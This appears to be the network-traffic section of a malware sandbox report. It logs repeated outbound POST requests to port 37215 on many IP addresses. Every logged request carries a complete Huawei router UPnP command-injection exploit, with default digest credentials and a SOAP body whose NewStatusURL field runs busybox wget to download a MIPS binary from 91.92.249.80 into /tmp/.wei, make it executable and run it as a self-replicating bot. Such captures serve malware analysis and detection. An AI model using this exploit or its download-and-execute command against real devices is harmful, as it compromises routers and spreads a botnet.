                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1854192.168.2.2355952197.44.181.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551181078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1855192.168.2.2345954197.78.195.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551184893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1856192.168.2.2333896197.29.85.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551187992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1857192.168.2.2344382186.29.249.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551187992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1858192.168.2.233804641.231.2.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551214933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1859192.168.2.235991827.43.254.17437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551244974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1860192.168.2.2338154157.92.239.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551707983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1861192.168.2.2335932121.99.232.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551711082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1862192.168.2.233303641.2.152.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551767111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1863192.168.2.235601441.39.24.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551775932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
